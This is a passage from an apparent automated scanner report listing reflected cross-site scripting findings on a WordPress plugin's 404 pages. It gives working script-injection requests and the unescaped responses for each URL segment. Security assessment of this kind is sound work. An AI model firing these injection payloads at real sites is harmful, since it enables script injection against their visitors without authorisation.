Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 928f1"><script>alert(1)</script>1c33f9cbad5 was submitted in the REST URL parameter 5. This input was echoed as 928f1\"><script>alert(1)</script>1c33f9cbad5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js928f1"><script>alert(1)</script>1c33f9cbad5/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js928f1\"><script>alert(1)</script>1c33f9cbad5/mootools-1.2.3.1-more.js" />
...[SNIP]...

1.234. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aba1"><script>alert(1)</script>0cbb2f96b6 was submitted in the REST URL parameter 6. This input was echoed as 3aba1\"><script>alert(1)</script>0cbb2f96b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js3aba1"><script>alert(1)</script>0cbb2f96b6 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js3aba1\"><script>alert(1)</script>0cbb2f96b6" />
...[SNIP]...

1.235. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f91c"><script>alert(1)</script>89e1dc2587 was submitted in the REST URL parameter 1. This input was echoed as 6f91c\"><script>alert(1)</script>89e1dc2587 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site6f91c"><script>alert(1)</script>89e1dc2587/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674574; expires=Thu, 02-Feb-2012 19:22:54 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site6f91c\"><script>alert(1)</script>89e1dc2587/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js" />
...[SNIP]...

1.236. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 246ce"><script>alert(1)</script>c071be92443 was submitted in the REST URL parameter 2. This input was echoed as 246ce\"><script>alert(1)</script>c071be92443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content246ce"><script>alert(1)</script>c071be92443/plugins/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content246ce\"><script>alert(1)</script>c071be92443/plugins/superslider-postsincat/js/slideBox-v1.0.js" />
...[SNIP]...

1.237. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34091"><script>alert(1)</script>09174c8f3b0 was submitted in the REST URL parameter 3. This input was echoed as 34091\"><script>alert(1)</script>09174c8f3b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins34091"><script>alert(1)</script>09174c8f3b0/superslider-postsincat/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins34091\"><script>alert(1)</script>09174c8f3b0/superslider-postsincat/js/slideBox-v1.0.js" />
...[SNIP]...

1.238. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da63"><script>alert(1)</script>ef4ebc3ad8b was submitted in the REST URL parameter 4. This input was echoed as 7da63\"><script>alert(1)</script>ef4ebc3ad8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat7da63"><script>alert(1)</script>ef4ebc3ad8b/js/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat7da63\"><script>alert(1)</script>ef4ebc3ad8b/js/slideBox-v1.0.js" />
...[SNIP]...

1.239. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a778"><script>alert(1)</script>914349c7fa1 was submitted in the REST URL parameter 5. This input was echoed as 3a778\"><script>alert(1)</script>914349c7fa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js3a778"><script>alert(1)</script>914349c7fa1/slideBox-v1.0.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js3a778\"><script>alert(1)</script>914349c7fa1/slideBox-v1.0.js" />
...[SNIP]...

1.240. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1dfd"><script>alert(1)</script>f981ff2d39 was submitted in the REST URL parameter 6. This input was echoed as e1dfd\"><script>alert(1)</script>f981ff2d39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.jse1dfd"><script>alert(1)</script>f981ff2d39 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js/slideBox-v1.0.jse1dfd\"><script>alert(1)</script>f981ff2d39" />
...[SNIP]...

1.241. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acc0"><script>alert(1)</script>5fc51608de0 was submitted in the REST URL parameter 1. This input was echoed as 3acc0\"><script>alert(1)</script>5fc51608de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site3acc0"><script>alert(1)</script>5fc51608de0/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site3acc0\"><script>alert(1)</script>5fc51608de0/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

1.242. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 574e5"><script>alert(1)</script>2452676616d was submitted in the REST URL parameter 2. This input was echoed as 574e5\"><script>alert(1)</script>2452676616d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content574e5"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content574e5\"><script>alert(1)</script>2452676616d/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

1.243. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f714"><script>alert(1)</script>39a0a2ffe53 was submitted in the REST URL parameter 3. This input was echoed as 2f714\"><script>alert(1)</script>39a0a2ffe53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins2f714"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins2f714\"><script>alert(1)</script>39a0a2ffe53/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css" />
...[SNIP]...

1.244. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/plugin-data/superslider/ssPostinCat/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fda27"><script>alert(1)</script>618a4ef6632 was submitted in the REST URL parameter 4. This input was echoed as fda27\"><script>alert(1)</script>618a4ef6632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincatfda27"><script>alert(1)</script>618a4ef6632/plugin-data/superslider/ssPostinCat/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
